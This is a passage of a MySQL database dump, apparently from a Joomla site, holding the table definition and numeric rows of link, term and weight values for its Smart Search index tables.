69),(4917,1678955,1.05),(4917,1678956,1.30669),(4917,1678957,0.37331),(4917,1678958,0.93331),(4917,1678959,1.09669),(4917,1678960,1.12),(4917,1678961,1.19),(4917,1678962,1.05),(4917,1678963,1.19),(4917,1678964,2.52),(4917,1678965,2.8),(4917,1678966,0.56),(4917,1678967,1.05),(4917,1678968,1.09669),(4917,1678969,0.32669),(4917,1678970,1.16669),(4917,1678971,1.4),(4917,1678972,0.28),(4917,1678973,1.14331),(4917,1678974,1.37669),(4917,1678975,0.23331),(4917,1678976,1.12),(4917,1678977,1.16669),(4924,1680538,1.8668),(4924,1680539,5.3332),(4924,1680540,6.1332),(4924,1680566,0.68),(4927,1682714,0.28),(4927,1682715,1.68),(4927,1682716,1.14331),(4927,1682717,0.88669),(4927,1682718,5.3332),(4927,1682719,6.2668),(4927,1682768,0.98),(4927,1682769,1.14331),(4927,1682774,0.86331),(4927,1682775,1.12),(4927,1682776,0.95669),(4927,1682777,1.23669),(4927,1682778,0.65331),(4927,1682779,1.28331),(4927,1682780,1.4),(4927,1682781,0.46669),(4927,1682782,0.98),(4927,1682783,1.21331),(4927,1682784,0.51331),(4927,1682785,1.05),(4927,1682786,1.19),(4927,1682787,0.14),(4927,1682788,1.12),(4927,1682789,1.37669),(4927,1682802,0.98),(4927,1682803,1.07331),(4927,1682804,0.84),(4927,1682805,1.07331),(4927,1682806,0.88669),(4927,1682807,1.00331),(4927,1682808,1.02669),(4927,1682809,1.19),(4927,1682810,0.51331),(4927,1682811,1.30669),(4927,1682812,1.4),(4927,1682813,0.93331),(4927,1682814,1.05),(4927,1682815,1.02669),(4927,1682816,1.19),(4927,1682817,0.98),(4927,1682818,1.26),(4927,1682819,0.18669),(4927,1682820,0.95669),(4927,1682821,1.02669),(4927,1682822,0.56),(4927,1682823,1.09669),(4927,1682824,1.19),(4927,1682825,1.07331),(4927,1682826,1.28331),(4927,1682827,0.56),(4927,1682828,1.02669),(4927,1682829,1.19),(4927,1682830,0.28),(4927,1682831,0.98),(4927,1682832,1.14331),(4927,1682833,1.00331),(4927,1682834,1.16669),(4927,1682835,1.12),(4927,1682836,1.35331),(4927,1682837,0.28),(4927,1682838,1.00331),(4927,1682839,1.16669),(4927,1683228,0.56),(4927,1683229,0.93331),(4927,1683230,1.19),(4927,1683231,0.91),(4927,1683232,1.07331),(4929,1683768,3.00339),(4929,1683769,3.11661),(4934,1683964,0.32669),(4934,1683965,1.00331),(4934,1683966,1.14331),(4938,1686124,2.1332),(4938,1686125,5.7332),(4938,1686138,0.93331),(4938,1686139,1.09669),(4938,1686140,0.79331),(4940,1686140,0.79331),(4938,1686141,0.95669),(4940,1686141,0.95669),(4938,1686142,1.00331),(4938,1686143,1.21331),(4938,1686153,0.95669),(4938,1686154,1.07331),(4938,1686155,1.14331),(4938,1686156,1.21331),(4938,1686157,1.30669),(4938,1686158,0.46669),(4938,1686159,1.05),(4938,1686160,1.16669),(4938,1686161,1.02669),(4938,1686162,1.14331),(4938,1686163,1.07331),(4938,1686164,1.30669),(4938,1686165,0.37331),(4938,1686166,1.05),(4938,1686167,1.28331),(4938,1686168,0.18669),(4938,1686169,0.95669),(4938,1686170,1.12),(4938,1686171,0.37331),(4938,1686172,1.05),(4938,1686173,1.30669),(4940,1686174,0.98),(4938,1686174,5.32),(4940,1686175,1.09669),(4938,1686175,5.95346),(4938,1686176,0.18669),(4938,1686177,0.86331),(4938,1686178,1.02669),(4938,1686179,0.98),(4938,1686180,1.05),(4938,1686181,1.23669),(4938,1686182,1.30669),(4938,1686183,1.23669),(4938,1686184,1.33),(4938,1686185,1.05),(4938,1686186,1.23669),(4938,1686187,0.23331),(4938,1686188,0.95669),(4938,1686189,1.14331),(4938,1686190,0.37331),(4938,1686191,1.19),(4938,1686192,1.30669),(4938,1686193,0.74662),(4938,1686194,1.86662),(4938,1686195,1.14331),(4938,1686196,1.19),(4938,1686197,0.37331),(4938,1686198,1.14331),(4938,1686199,1.30669),(4938,1686200,0.37331),(4938,1686201,1.05),(4938,1686202,1.16669),(4938,1686203,0.56),(4938,1686204,1.26),(4938,1686205,1.35331),(4940,1688228,0.32669),(4940,1688229,1.09669),(4940,1688230,1.19),(4940,1688231,0.42),(4940,1688232,1.07331),(4940,1688233,1.28331),(4940,1688234,0.7),(4940,1688235,1.4),(4940,1688236,1.4),(4940,1688237,1.07331),(4940,1688238,1.26),(4940,1688239,1.02669),(4940,1688240,1.19),(4940,1688257,0.98),(4940,1688258,1.05),(4940,1688259,0.95669),(4940,1688260,1.19),(4940,1688261,0.95669),(4940,1688262,1.16669),(4940,1688263,0.91),(4940,1688264,1.07331),(4940,1688265,0.42),(4940,1688266,1.16669),(4940,1688267,1.28331),(4940,1688268,0.60669),(4940,1688269,1.26),(4940,1688270,1.4),(4940,1688271,1.19),(4940,1688272,1.33),(4940,1688273,0.68),(4940,1688274,2.66339),(4940,1688275,2.77661),(4940,1688276,0.81669),(4940,1688277,0.95669),(4940,1688278,2.60661),(4940,1688279,2.77661),(4940,1688280,0.60669),(4940,1688281,1.12),(4940,1688282,1.35331),(4940,1688283,0.18669),(4940,1688284,0.88669),(4940,1688285,1.12),(4940,1688286,0.90661),(4940,1688287,2.72),(4940,1688288,3.11661),(4940,1688289,0.28),(4940,1688290,1.05),(4940,1688291,1.4),(4948,1689330,2.26661),(4953,1689418,0.79339),(4953,1689419,2.38),(4953,1689420,2.60661);
/*!40000 ALTER TABLE `fw3gt_finder_links_termsb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_termsc`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_termsc`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_termsc` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_termsc`
--

LOCK TABLES `fw3gt_finder_links_termsc` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_termsc` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_termsc` VALUES (4658,1523574,0.28),(4669,1523574,0.28),(4741,1523574,0.28),(4940,1523574,0.28),(4693,1523574,0.56),(4938,1523574,0.56),(4735,1523574,0.8),(4653,1523574,1.48),(4723,1523574,1.48),(4736,1523574,1.48),(4764,1523574,1.48),(4767,1523574,1.48),(4909,1523574,1.6),(4653,1523575,2.6),(4723,1523575,2.6),(4735,1523575,2.6),(4736,1523575,2.6),(4764,1523575,2.6),(4658,1523576,0.91),(4669,1523576,0.91),(4741,1523576,0.91),(4940,1523576,0.91),(4938,1523576,1.82),(4653,1523576,2.21),(4723,1523576,2.21),(4736,1523576,2.21),(4764,1523576,2.21),(4538,1523783,0.4),(4538,1523784,2.3334),(4538,1523785,2.5334),(4538,1523786,0.4),(4539,1523786,0.8),(4540,1523786,0.8),(4538,1523787,2.3334),(4538,1523788,2.5334),(4608,1523789,0.14),(4777,1523789,0.14),(4938,1523789,0.14),(4614,1523789,0.28),(4849,1523789,0.28),(4917,1523789,0.28),(4539,1523789,0.34),(4538,1523789,0.4),(4538,1523790,2.3334),(4538,1523791,2.5334),(4538,1523792,0.8),(4539,1523792,0.8),(4540,1523792,0.8),(4538,1523793,2.4666),(4539,1523793,2.4666),(4540,1523793,2.4666),(4538,1523794,2.6666),(4539,1523814,0.4),(4539,1523815,2.3334),(4539,1523816,2.5334),(4539,1523817,2.3334),(4539,1523818,2.5334),(4539,1523819,2.3334),(4540,1523819,2.3334),(4539,1523820,2.5334),(4539,1523821,2.6666),(4540,1523821,2.6666),(4540,1523829,0.4),(4540,1523830,2.5334),(4540,1523831,2.3334),(4540,1523832,2.5334),(4540,1523833,0.4),(4918,1523833,1.14),(4540,1523834,2.3334),(4540,1523835,2.5334),(4540,1523836,0.34),(4813,1523836,0.34),(4721,1523836,1.02),(4710,1523836,1.16),(4541,1523844,0.34),(4658,1523855,0.42),(4543,1523855,0.51),(4552,1523939,1.47339),(4755,1523939,1.47339),(4552,1523940,2.77661),(4552,1523941,0.65331),(4552,1523942,1.09669),(4552,1523943,1.28331),(4569,1524752,0.68),(4569,1524753,0.21),(4569,1524754,1.05),(4569,1524755,1.30669),(4571,1524942,0.23331),(4571,1524943,0.95669),(4571,1524944,1.05),(4571,1524945,0.21),(4661,1524945,0.21),(4571,1524946,1.05),(4661,1524946,1.05),(4571,1524947,1.30669),(4661,1524947,1.30669),(4571,1524948,0.68),(4572,1525005,0.21),(4572,1525006,1.05),(4572,1525007,1.30669),(4572,1525008,0.28),(4839,1525008,0.28),(4572,1525009,0.91),(4839,1525009,0.91),(4572,1525010,0.95669),(4572,1525011,0.68),(4574,1525099,0.68),(4604,1525137,0.14),(4608,1525137,0.14),(4614,1525137,0.14),(4616,1525137,0.14),(4617,1525137,0.14),(4624,1525137,0.14),(4625,1525137,0.14),(4626,1525137,0.14),(4735,1525137,0.4),(4653,1525137,0.74),(4594,1526028,0.07),(4604,1526028,0.07),(4614,1526028,0.07),(4616,1526028,0.07),(4624,1526028,0.07),(4626,1526028,0.14),(4798,1526028,0.14),(4585,1526028,0.17),(4580,1526028,0.2),(4849,1526028,0.2),(4850,1526028,0.2),(4917,1526028,0.2),(4918,1526028,0.2),(4924,1526028,0.2),(4928,1526028,0.2),(4929,1526028,0.2),(4934,1526028,0.2),(4935,1526028,0.2),(4940,1526028,0.2),(4945,1526028,0.2),(4951,1526028,0.2),(4953,1526028,0.2),(4956,1526028,0.2),(4608,1526028,0.21),(4625,1526028,0.21),(4658,1526028,0.21),(4909,1526028,0.27),(4927,1526028,0.27),(4938,1526028,0.27),(4732,1526028,0.35),(4762,1526028,0.42),(4837,1526028,0.6),(4761,1526028,1.05),(4594,1526043,0.07),(4625,1526043,0.07),(4626,1526043,0.07),(4732,1526043,0.14),(4762,1526043,0.14),(4580,1526043,0.17),(4837,1526043,0.2),(4849,1526043,0.2),(4850,1526043,0.2),(4909,1526043,0.2),(4918,1526043,0.2),(4924,1526043,0.2),(4927,1526043,0.2),(4928,1526043,0.2),(4929,1526043,0.2),(4934,1526043,0.2),(4935,1526043,0.2),(4938,1526043,0.2),(4940,1526043,0.2),(4945,1526043,0.2),(4951,1526043,0.2),(4953,1526043,0.2),(4956,1526043,0.2),(4917,1526043,0.27),(4658,1526043,0.58),(4761,1526280,0.42),(4581,1526280,0.51),(4591,1527326,0.51),(4592,1527341,0.51),(4593,1527342,0.68),(4594,1527469,0.21),(4594,1527470,0.84),(4594,1527471,0.95669),(4594,1527472,0.14),(4604,1527472,0.14),(4616,1527472,0.14),(4625,1527472,0.14),(4693,1527472,0.14),(4614,1527472,0.28),(4732,1527472,0.28),(4735,1527472,0.4),(4798,1527472,0.42),(4624,1527472,0.7),(4813,1527472,0.74),(4594,1527473,0.91),(4594,1527474,1.02669),(4594,1527475,0.79331),(4594,1527476,0.84),(4594,1527477,0.68),(4594,1527478,0.21),(4617,1527478,0.21),(4625,1527478,0.21),(4594,1527479,0.84),(4594,1527480,0.98),(4594,1527489,0.79331),(4594,1527490,0.84),(4594,1527491,0.18669),(4594,1527492,0.84),(4594,1527493,0.91),(4595,1527724,0.51),(4658,1528766,0.07),(4927,1528766,0.07),(4940,1528766,0.07),(4604,1528766,0.14),(4617,1528766,0.14),(4625,1528766,0.14),(4755,1528766,0.17),(4608,1528766,0.21),(4614,1528766,0.21),(4616,1528766,0.21),(4917,1528766,0.21),(4909,1528766,0.28),(4732,1528766,0.35),(4762,1528766,0.35),(4938,1528766,0.35),(4929,1528766,0.57),(4798,1528766,0.63),(4761,1528766,1.26),(4626,1528766,1.33),(4604,1528772,0.21),(4625,1528772,0.21),(4749,1528772,0.21),(4761,1528772,0.21),(4851,1528772,0.21),(4608,1528772,0.42),(4624,1528772,0.42),(4798,1528772,1.02),(4626,1528772,1.32),(4604,1528791,0.14),(4608,1528791,0.14),(4741,1528791,0.14),(4749,1528791,0.14),(4852,1528791,0.14),(4614,1528791,0.28),(4761,1528791,0.28),(4624,1528791,0.74),(4753,1528791,0.74),(4604,1528794,0.21),(4616,1528794,0.21),(4608,1528794,0.63),(4604,1528844,0.14),(4608,1528844,0.14),(4614,1528844,0.14),(4616,1528844,0.14),(4617,1528844,0.14),(4625,1528844,0.14),(4604,1528874,0.04669),(4614,1528874,0.04669),(4617,1528874,0.04669),(4624,1528874,0.04669),(4849,1528874,0.04669),(4927,1528874,0.04669),(4938,1528874,0.04669),(4940,1528874,0.04669),(4608,1528874,0.09338),(4777,1528874,0.09338),(4721,1528874,0.32683),(4734,1528874,0.44022),(4604,1535915,0.77),(4614,1535915,0.77),(4626,1535915,0.77),(4604,1535916,0.95669),(4604,1535917,0.77),(4616,1535917,2.31),(4626,1535917,4.62),(4604,1535918,0.88669),(4616,1535918,2.66007),(4604,1535919,0.21),(4798,1535919,0.84),(4604,1535920,0.81669),(4604,1535921,1.05),(4604,1535922,0.84),(4604,1535923,0.93331),(4604,1535924,0.86331),(4604,1535925,0.91),(4604,1535926,0.84),(4625,1535926,0.84),(4626,1535926,0.84),(4604,1535927,0.93331),(4604,1535928,0.81669),(4604,1535929,1.02669),(4604,1535930,0.81669),(4616,1535930,0.81669),(4604,1535931,1.07331),(4616,1535931,1.07331),(4604,1535932,0.68),(4604,1535933,0.79331),(4614,1535933,0.79331),(4616,1535933,0.79331),(4617,1535933,0.79331),(4624,1535933,0.79331),(4625,1535933,0.79331),(4626,1535933,0.79331),(4604,1535934,0.95669),(4614,1535934,0.95669),(4617,1535934,0.95669),(4625,1535934,0.95669),(4626,1535934,0.95669),(4604,1536062,0.86331),(4617,1536062,0.86331),(4849,1536062,0.86331),(4940,1536062,0.86331),(4604,1536063,1.02669),(4604,1536064,0.37331),(4604,1536065,1.26),(4604,1536066,1.33),(4604,1536067,0.23331),(4604,1536068,1.12),(4604,1536069,1.21331),(4604,1536070,0.42),(4604,1536071,1.12),(4604,1536072,1.35331),(4604,1536073,0.46669),(4626,1536073,0.46669),(4604,1536074,1.14331),(4604,1536075,1.33),(4608,1540007,0.07),(4909,1540007,0.07),(4761,1540007,0.56),(4608,1540008,0.77),(4608,1540009,0.84),(4608,1540010,0.21),(4608,1540011,0.84),(4608,1540012,1.02669),(4608,1540013,0.28),(4608,1540014,1.07331),(4608,1540015,1.28331),(4608,1540016,0.42),(4614,1540016,1.05),(4608,1540017,1.68),(4614,1540017,1.68),(4608,1540018,2.05338),(4614,1540018,2.05338),(4608,1540019,0.91),(4608,1540020,1.12),(4614,1540021,0.79331),(4608,1540021,1.58662),(4626,1540021,7.9331),(4608,1540022,1.07331),(4608,1540023,1.00331),(4608,1540024,1.68),(4608,1540025,1.02669),(4608,1540026,1.00331),(4608,1540027,0.28),(4614,1540027,0.28),(4608,1540028,0.84),(4614,1540028,0.84),(4608,1540029,1.00331),(4608,1540030,0.93331),(4614,1540030,0.93331),(4917,1540030,0.93331),(4608,1540031,0.98),(4614,1540031,0.98),(4608,1540032,0.56),(4608,1540033,1.72662),(4608,1540034,1.05),(4608,1540035,0.98),(4608,1540036,0.91),(4608,1540037,1.12),(4608,1540038,0.84),(4608,1540039,0.91),(4608,1540040,0.79331),(4608,1540041,0.93331),(4608,1540042,0.84),(4614,1540042,0.84),(4608,1540043,0.91),(4608,1540044,0.86331),(4608,1540045,0.93331),(4608,1540046,0.88669),(4608,1540047,0.93331),(4608,1540048,0.84),(4608,1540049,1.02669),(4608,1540050,0.28),(4614,1540050,0.28),(4608,1540051,0.86331),(4614,1540051,0.86331),(4608,1540052,1.05),(4608,1540053,0.68),(4608,1540054,0.81669),(4608,1540055,1.05),(4608,1540083,0.14),(4608,1540084,0.81669),(4608,1540085,1.00331),(4608,1540086,0.21),(4608,1540087,0.84),(4608,1540088,0.95669),(4608,1540117,0.81669),(4608,1540118,0.91),(4608,1540119,0.77),(4608,1540120,0.93331),(4614,1546145,0.49),(4614,1546146,0.91),(4614,1546147,0.98),(4614,1546148,0.49),(4614,1546149,0.91),(4614,1546150,0.98),(4614,1546151,0.86331),(4614,1546152,0.93331),(4614,1546153,1.68),(4614,1546154,2.05338),(4614,1546155,0.77),(4614,1546156,0.81669),(4614,1546157,0.84),(4614,1546158,0.98),(4614,1546159,0.84),(4614,1546160,0.93331),(4614,1546161,0.79331),(4624,1546161,0.79331),(4614,1546162,0.86331),(4614,1546163,1.09669),(4614,1546164,0.88669),(4614,1546165,0.95669),(4614,1546166,0.28),(4614,1546167,0.86331),(4614,1546168,1.05),(4614,1546169,0.28),(4614,1546170,0.86331),(4614,1546171,1.05),(4614,1546172,0.14),(4624,1546172,0.14),(4614,1546173,0.84),(4614,1546174,0.91),(4614,1546175,0.77),(4614,1546176,0.93331),(4614,1546177,0.21),(4625,1546177,0.21),(4798,1546177,0.63),(4614,1546178,0.81669),(4614,1546179,0.88669),(4614,1546180,0.21),(4614,1546181,0.93331),(4614,1546182,1.12),(4614,1546183,0.91),(4614,1546184,0.98),(4614,1546185,1.07331),(4614,1546186,0.35),(4614,1546187,0.98),(4614,1546188,1.02669),(4614,1546189,1.05),(4614,1546190,0.68),(4614,1546191,0.28),(4799,1546191,0.68),(4614,1546192,0.86331),(4614,1546193,1.05),(4614,1546257,0.91),(4614,1546258,0.98),(4616,1546259,0.14),(4617,1546259,0.14),(4721,1546259,0.14),(4734,1546259,0.14),(4762,1546259,0.14),(4839,1546259,0.14),(4940,1546259,0.14),(4614,1546259,0.28),(4927,1546259,0.28),(4625,1546259,0.42),(4626,1546259,0.56),(4614,1546260,0.91),(4614,1546261,1.05),(4614,1546262,0.81669),(4614,1546263,0.98),(4614,1546264,0.42),(4614,1546265,1.28331),(4614,1546266,1.4),(4614,1546267,0.46669),(4614,1546268,1.09669),(4614,1546269,1.16669),(4614,1546270,1.02662),(4614,1546271,1.00331),(4614,1546272,1.16669),(4614,1546273,1.02669),(4614,1546274,1.19),(4614,1546275,0.56),(4614,1546276,1.21331),(4614,1546277,1.30669),(4614,1546278,0.51331),(4614,1546279,1.14331),(4614,1546280,1.21331),(4614,1546281,0.28),(4614,1546282,0.95669),(4614,1546283,1.02669),(4616,1547679,0.84),(4616,1547680,0.88669),(4616,1547681,0.18662),(4616,1547682,1.72662),(4616,1547683,2.14662),(4616,1547684,0.84),(4616,1547685,0.98),(4616,1547686,0.84),(4616,1547687,3.26676),(4616,1547688,1.72662),(4616,1547689,1.77338),(4616,1547690,0.68),(4616,1547691,1.00331),(4616,1547704,0.28),(4616,1547705,0.91),(4616,1547706,1.00331),(4616,1547707,0.79331),(4616,1547708,0.93331),(4616,1547763,1.02669),(4616,1547764,1.33),(4616,1547765,1.7),(4616,1547766,3.17339),(4616,1547767,3.4),(4617,1548190,0.93331),(4617,1548191,1.12),(4617,1548192,0.93331),(4617,1548193,1.12),(4617,1548194,0.28),(4617,1548195,0.86331),(4617,1548196,1.19),(4617,1548197,0.35),(4617,1548198,0.88669),(4617,1548199,1.19),(4617,1548200,0.68),(4617,1548201,0.81669),(4625,1548201,0.81669),(4617,1548202,1.07331),(4617,1548203,0.23331),(4617,1548204,0.91),(4617,1548205,1.21331),(4617,1548238,0.91),(4617,1548239,0.95669),(4617,1548240,1.09669),(4617,1548241,0.65331),(4617,1548242,1.12),(4617,1548243,1.30669),(4617,1548244,0.7),(4617,1548245,1.26),(4617,1548246,1.35331),(4617,1548247,0.7),(4617,1548248,1.14331),(4617,1548249,1.37669),(4624,1553834,0.28),(4624,1553835,0.86331),(4624,1553836,0.91),(4624,1553837,0.28),(4624,1553838,0.84),(4624,1553839,1.02669),(4624,1553840,0.28),(4624,1553841,0.86331),(4624,1553842,0.91),(4624,1553843,0.28),(4624,1553844,0.86331),(4624,1553845,0.91),(4624,1553846,1.02669),(4624,1553847,1.63338),(4798,1553847,2.45007),(4624,1553848,1.91338),(4624,1553849,1.58662),(4624,1553850,2.00662),(4625,1553851,0.81669),(4624,1553851,1.63338),(4626,1553851,2.80008),(4624,1553852,1.05),(4624,1553853,1.02669),(4624,1553854,0.81669),(4624,1553855,0.88669),(4624,1553856,0.14),(4852,1553856,0.14),(4624,1553857,0.88669),(4624,1553858,1.28331),(4624,1553859,0.84),(4624,1553860,0.93331),(4624,1553861,2.4666),(4624,1553862,3),(4624,1553863,2.04),(4624,1553864,2.49339),(4624,1553865,0.28),(4624,1553866,0.84),(4624,1553867,1.21331),(4624,1553868,0.14),(4851,1553868,0.14),(4909,1553868,0.28),(4767,1553868,0.74),(4814,1553868,0.74),(4929,1553868,1.14),(4624,1553869,0.91),(4624,1553870,1.09669),(4624,1553871,0.68),(4624,1553872,0.91),(4624,1554008,0.91),(4624,1554009,1.09669),(4624,1554010,0.51331),(4624,1554011,1.12),(4624,1554012,1.19),(4624,1554013,0.93338),(4624,1554014,2.28662),(4624,1554015,1.4),(4624,1554016,1.19),(4624,1554017,0.37331),(4624,1554018,1.09669),(4624,1554019,1.28331),(4625,1554854,1.77338),(4625,1554855,0.98),(4625,1554856,0.95669),(4625,1554857,0.81669),(4625,1554858,1.07331),(4625,1554859,0.88669),(4625,1554860,0.86331),(4625,1554861,0.93331),(4625,1554862,0.88669),(4625,1554863,0.95669),(4625,1554864,1.05),(4625,1554865,0.88669),(4625,1554866,0.98),(4625,1554867,0.68),(4625,1554868,0.86331),(4625,1554874,0.88669),(4625,1554875,0.98),(4625,1554924,0.91),(4625,1554925,1.05),(4625,1554926,1.00331),(4625,1554927,1.16669),(4625,1554928,0.95669),(4625,1554929,1.16669),(4625,1554930,0.51331),(4625,1554931,1.16669),(4625,1554932,1.4),(4625,1554933,0.37331),(4625,1554934,1.09669),(4625,1554935,1.23669),(4625,1554936,0.28),(4625,1554937,1.00331),(4625,1554938,1.28331),(4626,1555880,0.35),(4626,1555881,0.86331),(4626,1555882,1.09669),(4626,1555883,1.00331),(4626,1555884,1.86662),(4626,1555885,7.28),(4626,1555886,1.91338),(4626,1555887,3.73324),(4626,1555888,1.02669),(4626,1555889,1.09669),(4626,1555890,0.91),(4626,1555891,1.07331),(4626,1555892,0.35),(4927,1555892,0.35),(4626,1555893,0.88669),(4626,1555894,1.05),(4626,1555895,0.35),(4626,1555896,0.88669),(4626,1555897,1.14331),(4626,1555898,2.3334),(4626,1555899,3.0666),(4626,1555900,2.60661),(4626,1555901,0.98),(4626,1555902,0.49),(4626,1555903,0.93331),(4626,1555904,1.16669),(4669,1555905,0.21),(4626,1555905,0.42),(4626,1555906,1.72662),(4626,1555907,1.07331),(4626,1555908,1.09669),(4626,1555909,0.28),(4626,1555910,1.05),(4626,1555911,1.26),(4626,1555912,1.02669),(4626,1555913,1.21331),(4626,1555914,1.02669),(4626,1555915,0.77),(4626,1555916,0.84),(4626,1555917,0.7),(4626,1555918,0.88669),(4626,1555919,1.14331),(4626,1555920,1.09669),(4626,1555921,1.16669),(4626,1555922,0.68),(4626,1555923,0.35),(4626,1555924,0.88669),(4626,1555925,1.05),(4626,1555926,0.98),(4626,1555927,1.86662),(4626,1555928,1.19),(4626,1555929,1.19),(4626,1555930,0.14),(4626,1555931,0.84),(4626,1555932,1.00331),(4626,1555980,0.77),(4626,1555981,0.86331),(4626,1556061,0.86331),(4626,1556062,0.91),(4626,1556063,1.05),(4626,1556064,1.21331),(4626,1556065,1.02669),(4626,1556066,1.37669),(4626,1556067,1.00331),(4626,1556068,1.19),(4626,1556069,0.46669),(4626,1556070,1.00331),(4626,1556071,1.23669),(4626,1556072,0.32669),(4710,1556072,0.32669),(4626,1556073,0.95669),(4626,1556074,1.02669),(4626,1556075,0.7),(4626,1556076,1.33),(4626,1556077,1.4),(4626,1556078,0.7),(4626,1556079,1.30669),(4626,1556080,1.4),(4626,1556081,1.00331),(4626,1556082,1.4),(4626,1556083,0.60669),(4626,1556084,1.05),(4626,1556085,1.23669),(4626,1556086,0.7),(4626,1556087,1.37669),(4626,1556088,1.4),(4626,1556089,0.7),(4626,1556090,1.35331),(4626,1556091,1.4),(4626,1556092,0.7),(4626,1556093,1.28331),(4626,1556094,1.35331),(4626,1556095,0.56),(4626,1556096,1.14331),(4626,1556097,1.4),(4626,1556098,4.20021),(4626,1556099,1.16669),(4626,1556100,1.4),(4626,1556101,1.07331),(4626,1556102,1.30669),(4626,1556103,1.12),(4626,1556104,1.4),(4626,1556105,4.01324),(4626,1556106,4.2),(4626,1556107,1.14331),(4626,1556108,1.28331),(4626,1556109,1.09669),(4626,1556110,1.23669),(4626,1556111,2.28),(4626,1556112,2.43661),(4626,1556113,2.55),(4626,1556114,1.14331),(4626,1556115,1.21331),(4626,1556116,1.23669),(4626,1556117,1.4),(4626,1556118,0.98),(4626,1556119,1.37669),(4626,1556120,1.86676),(4626,1556121,2.00662),(4626,1556122,2.1),(4626,1556123,1.00331),(4626,1556124,1.33),(4626,1556125,1.12),(4626,1556126,1.16669),(4626,1556127,0.14),(4626,1556128,0.86331),(4626,1556129,1.23669),(4635,1558492,0.68),(4669,1558999,0.95669),(4741,1558999,0.95669),(4653,1560554,2.8),(4653,1560555,2.38),(4653,1560556,0.68),(4653,1560557,2.7334),(4653,1560558,3.0666),(4653,1560559,2.21),(4653,1560560,2.49339),(4658,1562853,0.21),(4658,1562854,0.91),(4658,1562855,0.95669),(4658,1562856,0.21),(4658,1562857,0.91),(4658,1562858,0.95669),(4658,1562859,1.00331),(4658,1562860,1.09669),(4658,1562861,0.21),(4658,1562862,0.86331),(4658,1562863,1.00331),(4658,1562864,0.21),(4658,1562865,0.86331),(4658,1562866,1.00331),(4658,1562867,0.86331),(4658,1562868,1.00331),(4658,1562869,0.86331),(4658,1562870,0.21),(4658,1562871,0.86331),(4658,1562872,1.00331),(4658,1562873,0.21),(4658,1562874,0.86331),(4658,1562875,1.00331),(4658,1562876,1.00331),(4658,1562877,1.09669),(4658,1562878,1.82),(4658,1562879,0.95669),(4658,1562880,1.00331),(4658,1562881,1.09669),(4658,1562882,0.21),(4658,1562883,0.91),(4658,1562884,0.95669),(4658,1562885,0.68),(4658,1562925,2.8),(4658,1562926,3.3334),(4658,1562927,1.02669),(4658,1562928,1.09669),(4658,1562929,3.19992),(4658,1562930,3.84),(4658,1562931,0.95669),(4658,1562932,1.05),(4658,1562957,0.56),(4658,1562958,1.14331),(4658,1562959,1.26),(4661,1563458,0.28),(4661,1563459,0.91),(4661,1563460,0.95669),(4661,1563461,0.68),(4664,1563615,0.68),(4669,1564734,1.05),(4669,1564735,1.30669),(4669,1564736,0.68),(4672,1564827,0.68),(4673,1564858,0.68),(4678,1565333,0.68),(4687,1568588,0.68),(4693,1569257,0.88669),(4693,1569258,1.05),(4693,1569259,0.86331),(4693,1569260,1.00331),(4693,1569261,1.05),(4693,1569262,1.23669),(4693,1569263,0.68),(4693,1569310,2.4),(4693,1569311,4.8),(4693,1569312,4.8),(4693,1569313,1.03323),(4693,1569314,3.4),(4693,1569315,3.4),(4693,1569316,1.00331),(4693,1569317,1.21331),(4693,1569318,0.95669),(4693,1569319,1.02669),(4710,1583964,2.7334),(4721,1583964,2.7334),(4721,1583966,4.03),(4710,1583966,4.94),(4710,1584077,0.23331),(4721,1584077,0.23331),(4710,1592149,3),(4710,1592150,1.02669),(4710,1592151,1.02669),(4710,1592152,0.95669),(4710,1592153,2.49339),(4710,1592154,0.28),(4710,1592155,0.91),(4710,1592156,1.05),(4710,1592157,0.28),(4710,1592158,0.93331),(4710,1592159,1.16669),(4710,1592160,0.28),(4710,1592161,0.91),(4710,1592162,1.16669),(4710,1592163,0.28),(4710,1592164,0.91),(4710,1592165,0.95669),(4710,1592166,0.68),(4710,1592167,0.21),(4710,1592168,0.86331),(4710,1592169,0.93331),(4710,1592196,0.32669),(4710,1592197,1.12),(4710,1592198,1.35331),(4710,1592199,0.42),(4710,1592200,1.09669),(4710,1592201,1.23669),(4710,1592202,1.21331),(4710,1592203,1.4),(4710,1592204,0.86331),(4710,1592205,1.07331),(4710,1592206,0.23331),(4710,1592207,1.00331),(4710,1592208,1.35331),(4721,1602890,3.2),(4721,1602891,1.09669),(4721,1602892,0.98),(4721,1602893,2.55),(4721,1602894,0.28),(4721,1602895,0.91),(4721,1602896,1.07331),(4721,1602897,0.68),(4721,1602982,0.79331),(4927,1602982,0.79331),(4721,1602983,0.93331),(4721,1602984,0.91),(4721,1602985,1.07331),(4721,1602986,0.79331),(4721,1602987,1.00331),(4721,1602988,0.93331),(4721,1602989,0.98),(4721,1602990,0.86331),(4721,1602991,1.00331),(4721,1602992,0.88669),(4721,1602993,0.93331),(4721,1602994,0.79331),(4721,1602995,0.93331),(4721,1602996,0.91),(4721,1602997,0.95669),(4721,1602998,0.37331),(4721,1602999,0.95669),(4721,1603000,1.14331),(4721,1603001,0.91),(4721,1603002,0.51331),(4721,1603003,1.00331),(4721,1603004,1.23669),(4723,1604952,0.68),(4727,1605060,0.68),(4727,1605078,0.79339),(4727,1605079,2.66339),(4732,1613279,0.77),(4761,1613279,2.31),(4798,1613279,2.31),(4732,1613280,0.93331),(4732,1613281,0.88669),(4761,1613281,0.88669),(4732,1613282,1.02669),(4761,1613282,1.02669),(4732,1613283,0.95669),(4732,1613284,1.09669),(4732,1613285,0.91),(4732,1613286,1.02669),(4732,1613287,0.86331),(4732,1613288,1.28331),(4732,1613289,1.00331),(4732,1613290,1.19),(4732,1613291,0.93331),(4732,1613292,1.07331),(4732,1613293,0.28),(4764,1613293,0.74),(4732,1613294,0.93331),(4732,1613295,1.09669),(4732,1613296,0.93331),(4732,